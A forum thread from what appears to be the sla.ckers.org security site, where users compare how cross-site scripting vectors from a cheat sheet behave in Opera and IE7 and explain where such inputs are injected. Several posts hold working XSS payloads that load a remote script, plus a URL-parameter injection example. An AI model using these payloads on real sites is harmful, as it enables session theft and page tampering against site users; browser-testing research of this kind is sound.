Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Bug reports, feature enhancements or other complaints with the site, with us or just tell us what a miserable existance you have. No death threats or poetry please. Just kidding, no poetry please. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
xss cheat sheet browsers
Posted by: maluc
Date: September 17, 2006 09:32AM

i'm testing them for use in browser detecting and came across one that was untested for opera. -i'll include more if i find them

<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> that vector works for opera8.54 (and 9) .. interestingly though, i think ie7 may not allow external alerts, although it didn't still insert the remote text.

if you'd like to extend the cheat sheet's legend for ie7 and opera9 .. i'll be testing about half of them and recording the results.

-maluc

Options: ReplyQuote
Re: xss cheat sheet browsers
Posted by: maluc
Date: September 17, 2006 09:44AM

<SCRIPT SRC=http://ha.ckers.org/xss.js?<B> works in all browsers tested .. although it seriously fucks up the html for the rest of the page, in all browsers

until it reaches a </script> anyway

Edit: the same goes for the vector: <SCRIPT SRC=//ha.ckers.org/.j> .. renders in all browsers but messes up the html that follows.. and works correctly in all browsers with a </script> added

-maluc



Edited 1 time(s). Last edit at 09/17/2006 09:49AM by maluc.

Options: ReplyQuote
Re: xss cheat sheet browsers
Posted by: rsnake
Date: September 17, 2006 01:04PM

I'm a little hesitant to add IE7.0 until it gets out of beta, although I have done quite a bit of testing myself... It appears that the javascript: directive inside images will be the biggest change between IE7.0 and IE6.0.

But yes, point taken, I need to re-test all the modern browsers. Anyone have BeEF with all the browsers?

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: xss cheat sheet browsers
Posted by: j-hc
Date: January 18, 2007 05:36AM

i dont mean to sound stupid, but what do i insert these codes into?? like bloggs? profiles? or what?

Options: ReplyQuote
Re: xss cheat sheet browsers
Posted by: rsnake
Date: January 19, 2007 04:28PM

Those places, yes... but most often it's in URL parameters:

h ttp://whatever.com/function.php?variable1=stuff&variable2=stuff

You would insert it where you saw the "stuff" so it might look like:

h ttp://whatever.com/function.php?variable1=<script>alert("XSS")</script>&variable2=stuff

There are lots of other places, but that should give you an idea.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote


Sorry, only registered users may post in this forum.